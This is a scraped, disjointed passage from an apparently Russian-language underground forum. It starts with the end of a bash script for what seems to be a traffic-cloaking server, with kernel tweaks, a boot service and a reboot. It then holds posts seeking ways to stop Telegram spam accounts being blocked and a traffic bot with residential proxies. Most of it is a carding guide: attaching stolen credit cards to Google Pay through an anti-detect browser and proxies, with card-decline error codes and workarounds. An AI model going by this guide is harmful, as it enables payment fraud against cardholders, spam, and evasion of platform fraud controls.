                 [38;5;235m▄[48;5;235;38;5;248m▄[48;5;236;38;5;188m▄[48;5;247;38;5;254m▄[48;5;251;38;5;254m▄[48;5;253;38;5;255m▄[48;5;254;38;5;255m▄[48;5;254;38;5;255m▄[48;5;255m▄[48;5;255;38;5;255m▄[48;5;255m▄▄[48;5;255m▄▄▄▄[48;5;255m▄▄[48;5;255m▄[48;5;255;38;5;255m▄[48;5;254m▄[48;5;254;38;5;255m▄[48;5;252;38;5;255m▄[48;5;250;38;5;254m▄[48;5;245;38;5;253m▄[48;5;235;38;5;251m▄[48;5;235;38;5;246m▄[49;38;5;235m▄[39m              [00m
              [38;5;235m▄[48;5;235;38;5;250m▄[48;5;246;38;5;254m▄[48;5;252;38;5;255m▄[48;5;254;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255m▄[48;5;255m██████████████████[48;5;255m▄[48;5;255m▄[48;5;254;38;5;255m▄[48;5;253;38;5;255m▄[48;5;250;38;5;254m▄[48;5;244;38;5;252m▄[48;5;235;38;5;248m▄[49;38;5;236m▄[39m           [00m
           [38;5;235m▄[38;5;102m▄[48;5;242;38;5;253m▄[48;5;252;38;5;255m▄[48;5;254;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255m▄[48;5;255m██████████████████████████[48;5;255m▄[48;5;254;38;5;255m▄[48;5;253;38;5;255m▄[48;5;250;38;5;254m▄[48;5;59;38;5;250m▄[49;38;5;242m▄[38;5;235m▄[39m        [00m
          [48;5;235;38;5;102m▄[48;5;245;38;5;253m▄[48;5;253;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255m████████████████████████████████[48;5;255m▄[48;5;254;38;5;255m▄[48;5;251;38;5;254m▄[48;5;243;38;5;251m▄[49;38;5;242m▄[39m       [00m
        [38;5;235m▄[48;5;239;38;5;252m▄[48;5;253;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255m█████[38;5;255m▄▄▄[38;5;255m█████████████████████[38;5;255m▄[38;5;255m██████[48;5;255m▄[48;5;254;38;5;255m▄[48;5;250;38;5;253m▄[48;5;238;38;5;248m▄[49;38;5;235m▄[39m     [00m
       [48;5;235;38;5;242m▄[48;5;249;38;5;254m▄[48;5;254;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m██[38;5;255m▄[38;5;251m▄[48;5;254;38;5;59m▄[48;5;250;38;5;236m▄[48;5;102;38;5;234m▄[48;5;240;38;5;232m▄[48;5;239;38;5;233m▄[48;5;243m▄[48;5;145;38;5;232m▄[48;5;254;38;5;239m▄[48;5;255;38;5;252m▄[38;5;255m▄[38;5;255m████████████[38;5;255m▄[38;5;252m▄[48;5;254;38;5;239m▄[48;5;145;38;5;232m▄[48;5;243m▄[48;5;240m▄[48;5;240m▄[48;5;102;38;5;234m▄[48;5;250;38;5;236m▄[48;5;254;38;5;59m▄[48;5;255;38;5;251m▄[38;5;255m▄[38;5;255m██[48;5;255;38;5;255m▄[48;5;188;38;5;254m▄[48;5;246;38;5;251m▄[48;5;235;38;5;240m▄[49;39m    [00m
      [48;5;235;38;5;244m▄[48;5;252;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255m██[48;5;255;38;5;249m▄[48;5;145;38;5;237m▄[48;5;237;38;5;237m▄[48;5;236;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233m▄[38;5;233m▄▄[48;5;233;38;5;233m▄[48;5;238;38;5;233m▄[48;5;253;38;5;244m▄[48;5;255;38;5;255m▄[38;5;255m██████████[38;5;255m▄[48;5;253;38;5;244m▄[48;5;238;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[38;5;233m▄[38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;236;38;5;233m▄[48;5;237;38;5;237m▄[48;5;145;38;5;237m▄[48;5;255;38;5;249m▄[48;5;255;38;5;255m██[48;5;255m▄[48;5;253;38;5;254m▄[48;5;248;38;5;252m▄[48;5;235;38;5;95m▄[49;39m   [00m
     [48;5;235;38;5;145m▄[48;5;188;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255m█[38;5;255m▄[48;5;188;38;5;102m▄[48;5;238;38;5;238m▄[48;5;237;38;5;237m▄[48;5;235;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;234m▄[48;5;233;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;233;38;5;234m▄[48;5;233;38;5;234m▄[48;5;233;38;5;233m▄[48;5;188;38;5;145m▄[48;5;255;38;5;255m▄[38;5;255m████████[38;5;255m▄[48;5;188;38;5;145m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;234m▄[48;5;234;38;5;234m▄[38;5;234m▄[38;5;234m▄[48;5;233;38;5;234m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;235;38;5;233m▄[48;5;237;38;5;237m▄[48;5;238;38;5;238m▄[48;5;188;38;5;102m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m▄[48;5;254;38;5;254m▄[48;5;248;38;5;251m▄[48;5;235;38;5;236m▄[49;39m  [00m
    [48;5;235;38;5;234m▄[48;5;252;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m██[48;5;252;38;5;248m▄[48;5;238;38;5;239m▄[38;5;239m▄[48;5;236;38;5;234m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[38;5;235m▄[38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;233;38;5;234m▄[48;5;246;38;5;244m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m████████[48;5;255;38;5;255m█[48;5;246;38;5;244m▄[48;5;233;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;235m▄[38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;233;38;5;234m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;236;38;5;234m▄[48;5;238;38;5;239m▄▄[48;5;252;38;5;248m▄[48;5;255;38;5;255m██[48;5;255;38;5;255m▄[48;5;253;38;5;254m▄[48;5;246;38;5;249m▄[49;38;5;235m▄[39m [00m
    [48;5;245;38;5;250m▄[48;5;254;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m█[38;5;255m▄[48;5;255;38;5;255m█[48;5;245;38;5;243m▄[48;5;239;38;5;240m▄[48;5;239;38;5;239m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m█[48;5;234;38;5;234m█[48;5;234;38;5;234m█[48;5;234;38;5;234m▄[48;5;235;38;5;234m▄[48;5;235;38;5;235m▄[48;5;235;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;246;38;5;248m▄[48;5;255;38;5;255m▄[48;5;255m█████████[48;5;246;38;5;248m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m█[48;5;234;38;5;234m▄[48;5;235;38;5;235m█[48;5;235;38;5;235m█[48;5;235;38;5;235m█[48;5;234;38;5;234m▄[48;5;234;38;5;234m█[48;5;234;38;5;234m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m█[48;5;233;38;5;233m▄[48;5;239;38;5;239m▄[48;5;239;38;5;240m▄[48;5;245;38;5;243m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m█[48;5;255;38;5;255m▄[48;5;254;38;5;255m▄[48;5;251;38;5;188m▄[48;5;236;38;5;244m▄[49;39m [00m
   [48;5;235;38;5;235m▄[48;5;252;38;5;188m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m██[48;5;255m▄[48;5;102;38;5;248m▄[48;5;240;38;5;240m▄[48;5;240;38;5;240m▄[48;5;232;38;5;234m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234m▄[48;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;240m▄[48;5;252;38;5;254m▄[48;5;255;38;5;255m██████████[48;5;252;38;5;254m▄[48;5;233;38;5;240m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;234;38;5;234m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;232;38;5;235m▄[48;5;240;38;5;240m▄[48;5;240;38;5;59m▄[48;5;102;38;5;248m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255m█[48;5;255;38;5;255m▄[48;5;253;38;5;254m▄[48;5;247;38;5;248m▄[49;38;5;235m▄[39m[00m
   [48;5;235;38;5;235m▄[48;5;253;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m███[48;5;188;38;5;255m▄[48;5;241;38;5;249m▄[48;5;241;38;5;241m▄[48;5;238;38;5;241m▄[48;5;232;38;5;235m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;234;38;5;233m▄[38;5;233m▄[38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;244m▄[48;5;250;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255m███████████[48;5;250;38;5;254m▄[48;5;233;38;5;244m▄[48;5;234;38;5;233m▄[48;5;234;38;5;233m▄▄▄[48;5;234;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;233m▄[48;5;233;38;5;235m▄[48;5;238;38;5;241m▄[48;5;241m▄[48;5;241;38;5;249m▄[48;5;188;38;5;255m▄[48;5;255;38;5;255m███[48;5;255;38;5;255m█[48;5;254;38;5;254m▄[48;5;249;38;5;251m▄[48;5;235;38;5;235m▄[49;39m[00m
   [48;5;235;38;5;235m█[48;5;254;38;5;254m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m█[48;5;255;38;5;255m████[48;5;255m▄[48;5;249;38;5;255m▄[48;5;241;38;5;188m▄[48;5;59;38;5;248m▄[48;5;236;38;5;242m▄[48;5;232;38;5;239m▄[48;5;233;38;5;237m▄[48;5;233;38;5;234m▄[48;5;233;38;5;233m▄[48;5;233;38;5;239m▄[48;5;233;38;5;145m▄[48;5;243;38;5;254m▄[48;5;254;38;5;255m▄[48;5;255m██████████████[48;5;254m▄[48;5;243;38;5;254m▄[48;5;233;38;5;145m▄[48;5;233;38;5;240m▄[48;5;233;38;5;233m▄[48;5;233;38;5;234m▄[48;5;233;38;5;237m▄[48;5;233;38;5;239m▄[48;5;236;38;5;242m▄[48;5;59;38;5;248m▄[48;5;241;38;5;253m▄[48;5;249;38;5;255m▄[48;5;254;38;5;255m▄[48;5;255m████[48;5;255;38;5;255m█[48;5;254;38;5;254m█[48;5;251;38;5;251m▄[48;5;235;38;5;235m▄[49;39m[00m
   [48;5;235;38;5;235m█[48;5;254;38;5;254m█[48;5;255;38;5;255m█[48;5;255;38;5;255m█[48;5;255;38;5;255m████████[48;5;254m▄[48;5;188;38;5;255m▄[48;5;252;38;5;255m▄[48;5;252m▄[48;5;253m▄[48;5;254m▄[48;5;255m████████████████████[48;5;254m▄[48;5;253m▄[48;5;252;38;5;255m▄[48;5;252m▄[48;5;188m▄[48;5;254;38;5;255m▄[48;5;255m▄[48;5;255m███████[48;5;255;38;5;255m█[48;5;254;38;5;254m█[48;5;251;38;5;251m█[48;5;235;38;5;235m█[49;39m[00m
   [48;5;235;38;5;235m█[48;5;254;38;5;254m█[48;5;255;38;5;255m█[48;5;255;38;5;255m█[48;5;255;38;5;255m████████████████████████████████████████████████[48;5;255;38;5;255m█[48;5;254;38;5;254m█[48;5;251;38;5;251m█[48;5;235;38;5;235m█[49;39m[00m
   [48;5;235;38;5;235m▄[48;5;254;38;5;254m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m█[48;5;255;38;5;255m████████████████████████████████████████████████[48;5;255;38;5;255m█[48;5;254;38;5;254m█[48;5;251;38;5;251m█[48;5;235;38;5;235m█[49;39m[00m
   [48;5;235;38;5;235m▄[48;5;254;38;5;253m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m████████████████████████████████████████████████[48;5;255;38;5;255m█[48;5;254;38;5;254m█[48;5;251;38;5;251m█[48;5;235;38;5;235m█[49;39m[00m
   [48;5;235;38;5;235m▄[48;5;253;38;5;253m█[48;5;255;38;5;255m█[48;5;255;38;5;255m█[48;5;255;38;5;255m████████████████████████████████████████████████[48;5;255;38;5;255m█[48;5;254;38;5;254m█[48;5;251;38;5;251m█[48;5;235;38;5;235m█[49;39m[00m
   [48;5;235;38;5;235m█[48;5;253;38;5;253m█[48;5;255;38;5;255m█[48;5;255;38;5;255m█[48;5;255;38;5;255m████████████████████████████████████████████████[48;5;255;38;5;255m█[48;5;254;38;5;254m█[48;5;251;38;5;251m█[48;5;235;38;5;235m█[49;39m[00m
   [48;5;235;38;5;235m█[48;5;253;38;5;253m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m█[48;5;255;38;5;255m████████████████████████████████████████████████[48;5;255;38;5;255m█[48;5;254;38;5;254m█[48;5;251;38;5;251m█[48;5;235;38;5;235m█[49;39m[00m
   [48;5;235;38;5;235m▄[48;5;188;38;5;252m▄[48;5;255;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m████████████████████████████████████████████████[48;5;255;38;5;255m█[48;5;254;38;5;254m▄[48;5;251;38;5;251m▄[48;5;235;38;5;235m▄[49;39m[00m
    [48;5;248;38;5;234m▄[48;5;254;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[38;5;255m███████████████████████████████████████████████[48;5;255;38;5;255m█[48;5;254;38;5;254m▄[48;5;250;38;5;249m▄[48;5;235;38;5;235m▄[49;39m[00m
    [38;5;235m▀[48;5;252;38;5;247m▄[48;5;255;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[38;5;255m█[38;5;255m▄[38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[38;5;255m█████████████████████████████████████████[48;5;255;38;5;255m▄[48;5;254;38;5;253m▄[48;5;247;38;5;102m▄[49;39m [00m
     [38;5;235m▀[48;5;250;38;5;235m▄[48;5;254;38;5;145m▄[48;5;255;38;5;253m▄[48;5;255;38;5;254m▄[48;5;255;38;5;254m▄[48;5;253;38;5;249m▄[48;5;250;38;5;236m▄[48;5;255;38;5;188m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[38;5;255m▄▄[38;5;255m▄▄[38;5;255m▄[38;5;255m▄[38;5;255m███████████████████████[38;5;255m▄[38;5;255m▄[48;5;255;38;5;255m▄▄[48;5;255;38;5;255m▄[38;5;255m▄▄[38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;254m▄[48;5;188;38;5;248m▄[48;5;241;38;5;235m▄[49;39m [00m
       [38;5;235m▀[38;5;235m▀[38;5;101m▀[38;5;243m▀[38;5;235m▀[39m [38;5;235m▀[48;5;251;38;5;235m▄[48;5;254;38;5;242m▄[48;5;255;38;5;249m▄[48;5;255;38;5;249m▄[48;5;255;38;5;248m▄[48;5;254;38;5;244m▄[48;5;254;38;5;241m▄[48;5;255;38;5;249m▄[48;5;255;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[38;5;255m▄▄[38;5;255m▄[38;5;255m▄▄[38;5;255m▄[38;5;255m▄[38;5;255m████[38;5;255m▄[38;5;255m▄[48;5;255;38;5;255m▄[38;5;255m▄[48;5;255;38;5;255m▄[38;5;255m▄[38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;254m▄[48;5;254;38;5;251m▄[48;5;254;38;5;242m▄[48;5;253;38;5;235m▄[48;5;253;38;5;235m▄[48;5;254;38;5;237m▄[48;5;254;38;5;245m▄[48;5;255;38;5;248m▄[48;5;254;38;5;246m▄[48;5;253;38;5;237m▄[48;5;248;38;5;235m▄[49;38;5;235m▀[39m  [00m
                     [38;5;235m▀[38;5;102m▀[48;5;254;38;5;242m▄[48;5;255;38;5;252m▄[48;5;255;38;5;253m▄[48;5;255;38;5;252m▄[48;5;254;38;5;247m▄[48;5;253;38;5;235m▄[48;5;253;38;5;235m▄[48;5;254;38;5;247m▄[48;5;255;38;5;188m▄[48;5;255;38;5;254m▄[48;5;255;38;5;255m▄[48;5;255;38;5;255m▄[48;5;255;38;5;254m▄[48;5;255;38;5;188m▄[48;5;254;38;5;246m▄[48;5;250;38;5;235m▄[48;5;253;38;5;246m▄[48;5;255;38;5;250m▄[48;5;255;38;5;249m▄[48;5;254;38;5;102m▄[48;5;253;38;5;236m▄[48;5;251;38;5;235m▄[49;38;5;245m▀[38;5;235m▀[39m            [00m
                        [38;5;235m▀[38;5;235m▀[38;5;235m▀[39m    [38;5;235m▀[38;5;102m▀[38;5;250m▀[38;5;249m▀[38;5;243m▀[38;5;235m▀[39m                      [00m
                                                           [00m
" | base64 -d -w 0 > /usr/share/logo
#//// твики ядра и настроек стека. кто не понял - тот не поймет (с)
#//// wintcp ////
cat<<'EOF'>/usr/local/bin/wininit
echo 1 > /sys/kernel/mm/ksm/run
echo 10 > /proc/sys/vm/swappiness
echo 50 > /proc/sys/vm/vfs_cache_pressure
echo 1000000 > /proc/sys/fs/file-max
echo 3240000 > /proc/sys/net/ipv4/tcp_max_syn_backlog
echo 3240000 > /proc/sys/net/core/somaxconn
echo 0 > /proc/sys/net/ipv4/tcp_timestamps
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling
echo 128 > /proc/sys/net/ipv4/ip_default_ttl
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo 1 > /proc/sys/net/ipv4/conf/all/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter
echo 2048 > /proc/sys/net/ipv4/tcp_max_syn_backlog
echo 16384 > /proc/sys/net/ipv4/udp_rmem_min
echo 16384 > /proc/sys/net/ipv4/udp_wmem_min
echo 40960 > /proc/sys/net/core/optmem_max
echo 16777216 > /proc/sys/net/core/rmem_default
echo 16777216 > /proc/sys/net/core/rmem_max
echo 5000 > /proc/sys/net/core/somaxconn
echo 16777216 > /proc/sys/net/core/wmem_default
echo 16777216 > /proc/sys/net/core/wmem_max
echo bbr > /proc/sys/net/ipv4/tcp_congestion_control
echo 10 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 15 > /proc/sys/net/ipv4/tcp_keepalive_intvl
echo 5 > /proc/sys/net/ipv4/tcp_keepalive_probes
echo 60 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 3000 > /proc/sys/net/ipv4/tcp_max_syn_backlog
echo 40960 > /proc/sys/net/ipv4/tcp_max_tw_buckets
echo 4096 87380 16777216 > /proc/sys/net/ipv4/tcp_rmem
echo 0 > /proc/sys/net/ipv4/tcp_slow_start_after_idle
echo 1 > /proc/sys/net/ipv4/tcp_tw_reuse
echo 4096 65536 16777216 > /proc/sys/net/ipv4/tcp_wmem
EOF
chmod +x /usr/local/bin/wininit
cat<<'EOF'>/etc/init.d/wintcp
#!/bin/bash
### BEGIN INIT INFO
# Provides: scriptname
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start daemon at boot time
# Description: Enable service provided by daemon.
### END INIT INFO
sudo /usr/local/bin/wininit
EOF
chmod +x /etc/init.d/wintcp ; /etc/init.d/wintcp start ; systemctl enable wintcp ; systemctl start wintcp
#ребутим
cd /root ; rm -r ls-- rip* ; apt-get -y autoremove ; apt-get autoclean ; sudo -u root reboot
CLOACKEr
chmod +x init.sh
Думаю самые внимательные уже оценили логику скриптов баш и догадались что нужно сделать)))) Подедем итог:
Happy Hacking... Ну или чем Вы там заняты)
ЗЫ::: ОКЕ! юзать так: [B] cd /tmp/CLOACKa ; chmod +x *.sh ; ./pack.sh ВАШ_ДОМЕН [/B]
Арбитражники, трейдеры, майнеры и другие фантастические твари
Как продлить жизнь аккаунту в Телеграме? Есть база пользователей, но при рассылке они сразу кидают жалобы и акк почти сразу блочат. Может есть какие-то способы прогрева? Или еще какие то методы отправить хотя бы 20 пользователям с одного акка
Добрый вечер форумчане. Хочу поинтересоваться. Есть ли траффик бот с резидентскими проксями на подобие ipts? Спасибо за внимание
Сразу скажу что мануал это прям база, некоторые фишки нужно додумывать самим.
Рассказал как вязнуть СС в гугл.
Начнем:
Spoiler: gmail аккаунт
1. Залетаем в антик окто, создаем новое окно антика и вставляем проксю ( я
юзал ABC )
2. Заходим на gmail.com жмем создать почту
вот тут ставим для личного использования,
далее у нас попросят фио их генерим под страну залива ( прокси ).
Привязываем номер и идем дальше.
жмякаем сюда
2 fa ставим
2fa.live нам поможет привязать сюда ( гайды есть в инете )
Это тоже записываем, чтобы получать коды ( код это цифры в конце )
Акк готов! Даем ему 40 минут полежать и переходим к вязке карты
Spoiler: Вяжем СС в google pay
Залетаем в гугл фото
2.
жмякаем сюда и там уже выбираем тариф, вяжем карточку, ошибки которые могут
выпадать на этом этапе перечисляю тут:
Spoiler: ошибки при вязке карт
[OR-CCSEH-26] - Недостаточно средств на карте
Click to expand...
Причина : Недостаточное количество средств на карте для минимального платежа.
Решение : Проверьте баланс на карте и убедитесь, что на ней достаточно средств для списания минимальной суммы, указанной Google.
[OR-CCSEH-25] - Карта больше не валидна
Click to expand...
Причина : Карта может быть просрочена или заблокирована.
Решение : Обновите платежную информацию, добавив новую карту или свяжитесь с банком для решения проблем с текущей картой.
[OR-CCSEH-24] - Проблемы с аккаунтом
Click to expand...
Причина : Аккаунт может быть закрыт или приостановлен, что мешает проведению платежа.
Решение : Проверьте статус аккаунта и при необходимости свяжитесь с поддержкой Google Ads для выяснения причин.
[OR-CCSEH-21] - Карта не валидна
Click to expand...
Причина : Карта больше не действительна или неправильно введены данные карты.
Решение : Проверьте срок действия карты и правильность введенных данных. Если карта истекла, добавьте новую карту.
[OR-CCSEH-01] - Карта уже привязана к другому аккаунту
Click to expand...
Причина : Карта уже используется в другом аккаунте Google Ads.
Решение : Используйте другую карту или отвяжите карту от другого аккаунта.
[OR-CCSEH-05] - Устаревший "юзер агент"
Click to expand...
Причина : Проблема может быть вызвана тем, что вы используете устаревший браузер или "юзер агент".
Решение : Попробуйте обновить браузер или изменить настройки отпечатка, если вы используете специфические решения для обхода блокировок или проверки.
[OR-CCSEH-04] - Требуется "отлега"
Click to expand...
Причина : Проблемы могут возникать из-за попыток обойти системы безопасности Google, что может потребовать дополнительной "отлеги" (доверительной проверки).
Решение : Обеспечьте стабильную работу с аккаунтом, исключая подозрительные действия, и дождитесь, когда аккаунт пройдет доверительную проверку.
[OR-CCSEH-02] - Неправильные данные карты
Click to expand...
Причина : Ошибка ввода данных, таких как номер карты, срок действия или CVV-код.
Решение : Проверьте и повторно введите данные карты.
[OR-BAIH-01] - Ошибка проверки платежа банком
Click to expand...
Причина : Банк-эмитент карты отклонил транзакцию. Это может быть связано с ограничениями банка на интернет-платежи или блокировкой по подозрению в мошенничестве.
Решение : Свяжитесь с банком для разрешения проблемы.
[OR-PAMH-01] - Проблемы с платежной системой Google
Click to expand...
Причина : Внутренняя ошибка системы Google Payments.
Решение : Попробуйте повторить платеж позже или свяжитесь с поддержкой Google.
[OR-CCSEH-06] - Превышен лимит на платежи
Click to expand...
Причина : Банк может наложить ограничение на максимальную сумму транзакции.
Решение : Свяжитесь с банком для увеличения лимита на платежи или используйте другую карту.
[OR-IEH-02] - Ошибка внутренней системы Google
Click to expand...
Причина : Внутренний сбой в системе Google при обработке платежа или при создании платежного профиля.
Решение : Подождите некоторое время и попробуйте снова. Если проблема сохраняется, обратитесь в службу поддержки Google Ads.
[OR-BAIH-04] - Платеж отклонен банком
Click to expand...
Причина : Банк отклонил платеж из-за подозрений на мошенничество или по другой внутренней причине.
Решение : Свяжитесь с банком, чтобы узнать причину отклонения и разблокировать транзакцию.
[OR-BAIH-05] - Недопустимая страна банка
Click to expand...
Причина : Карта или банк, выпускающий карту, находятся в стране, которая не поддерживается системой Google для проведения платежей.
Решение : Используйте карту банка, расположенного в поддерживаемой стране, или добавьте другой способ оплаты.
[OR-PMSA-03] - Карта не поддерживает интернет-платежи
Click to expand...
Причина : Карта не предназначена для использования в интернете (например, корпоративная карта, которая заблокирована для онлайн-платежей).
Решение : Свяжитесь с банком для активации функции интернет-платежей или используйте другую карту.
[OR-CAC-01] - Неправильная страна в профиле аккаунта
Click to expand...
Причина : Страна в платежном профиле не совпадает со страной, к которой привязана карта или аккаунт Google.
Решение : Проверьте и при необходимости измените страну в платежном профиле на ту, которая соответствует стране карты.
[OR-CCSEH-23] - Недостаточно авторизации на карте
Click to expand...
Причина : На карте недостаточно средств для блокировки минимального платежа или авторизации.
Решение : Пополните карту или используйте другую карту с достаточным балансом для авторизации платежа.
[OR-ACH-01] - Проблемы с банковским счетом
Click to expand...
Причина : Если вы используете банковский счет для оплаты, возможно, у банка возникли технические проблемы с обработкой транзакции.
Решение : Свяжитесь с вашим банком или используйте другой способ оплаты (например, кредитную карту).
[OR-PMSA-04] - Ошибка при обработке платежа в сторонней платежной системе
Click to expand...
Причина : Проблемы с процессингом платежа сторонними сервисами (например, PayPal или другие системы).
Решение : Проверьте платежные данные, убедитесь, что сторонняя система работает корректно, и повторите попытку позже.
[OR-IEH-03] - Сбой при проверке учетных данных
Click to expand...
Причина : Ошибка в системе проверки платежных данных или учетных записей Google.
Решение : Убедитесь, что все введенные данные корректны, и попробуйте снова позже.
[OR-BAIH-08] - Проблемы с лимитом карты
Click to expand...
Причина : Карта достигла дневного или месячного лимита на проведение транзакций.
Решение : Свяжитесь с банком для увеличения лимита или используйте другую карту.
[OR-PMSA-05] - Несовместимость с текущим способом оплаты
Click to expand...
Причина : Выбранный способ оплаты не поддерживается для вашей учетной записи или региона.
Решение : Выберите другой способ оплаты, который поддерживается в вашем регионе.
[OR-CR-01] - Ошибка проверки кредитной карты
Click to expand...
Причина : Карта отклонена из-за невозможности пройти проверку платежной системой.
Решение : Убедитесь, что данные карты правильные, и попробуйте снова. Если ошибка повторяется, свяжитесь с банком.
[OR-ACCSH-10] - Заблокированный аккаунт Google Ads
Click to expand...
Причина : Аккаунт временно или навсегда заблокирован Google из-за подозрений на нарушение политики.
Решение : Свяжитесь с поддержкой Google для выяснения причин блокировки и, если возможно, решения проблемы.
[OR-IEH-05] - Внутренняя ошибка транзакции
Click to expand...
Причина : Ошибка на уровне процессинга транзакций внутри системы Google.
Решение : Повторите попытку через некоторое время или свяжитесь с поддержкой Google для устранения проблемы.
[OR-CBAT-04] - Ошибка авторизации карты
Click to expand...
Причина : Неправильные данные карты, блокировка банком или региональные ограничения.
Решение : Проверьте корректность данных, свяжитесь с банком для разблокировки транзакции или используйте другую карту.
[OR-CCSEH-20] - Ошибка обработки карты
Click to expand...
Причина : Карта не поддерживает международные платежи или интернет- платежи.
Решение : Свяжитесь с банком для активации этих функций или используйте другую карту.
[OR-IEH-01] - Проблема с интернет-соединением
Click to expand...
Причина : Плохое интернет-соединение мешает корректной отправке данных.
Решение : Проверьте соединение и попробуйте снова.
[OR-BAIH-02] - Банковская транзакция отклонена
Click to expand...
Причина : Банк заблокировал транзакцию из-за подозрения на мошенничество.
Решение : Свяжитесь с банком для разрешения проблемы и повторите попытку.
[OR-CCSEH-08] - Карта отклонена из-за устаревшего срока действия
Click to expand...
Причина : Карта просрочена.
Решение : Обновите платежные данные и добавьте карту с актуальным сроком действия.
[OR-PAMS-01] - Ошибка стороннего платежного сервиса
Click to expand...
Причина : Проблемы с платежным посредником (например, PayPal).
Решение : Проверьте статус вашего аккаунта в системе посредника и повторите попытку.
[OR-ACH-02] - Проблемы с банковским счетом
Click to expand...
Причина : Некорректные данные банковского счета или ограничения на транзакции.
Решение : Проверьте правильность данных и свяжитесь с банком.
[OR-PMSA-06] - Несовместимость карты с Google Ads
Click to expand...
Причина : Карта или способ оплаты не поддерживаются Google Ads для текущего региона.
Решение : Используйте другую карту или способ оплаты, который поддерживается в вашем регионе.
[OR-CCSEH-07] - Превышен лимит попыток авторизации
Click to expand...
Причина : Было слишком много попыток авторизации карты за короткий период времени.
Решение : Подождите некоторое время перед повторной попыткой или используйте другую карту.
[OR-BAIH-06] - Недоступен банк-эмитент карты
Click to expand...
Причина : Банк, выпустивший карту, временно недоступен или имеет технические проблемы.
Решение : Попробуйте провести платеж позже или используйте другую карту.
[OR-CCSEH-09] - Карта не поддерживается
Click to expand...
Причина : Карта не поддерживается для оплаты через Google Ads.
Решение : Используйте другую карту или выберите другой способ оплаты.
[OR-CR-02] - Ошибка проверки учетной записи
Click to expand...
Причина : Проблемы с учетной записью Google, связанной с платежами, возможно, она заблокирована или ограничена.
Решение : Проверьте статус учетной записи и свяжитесь с поддержкой Google для решения проблемы.
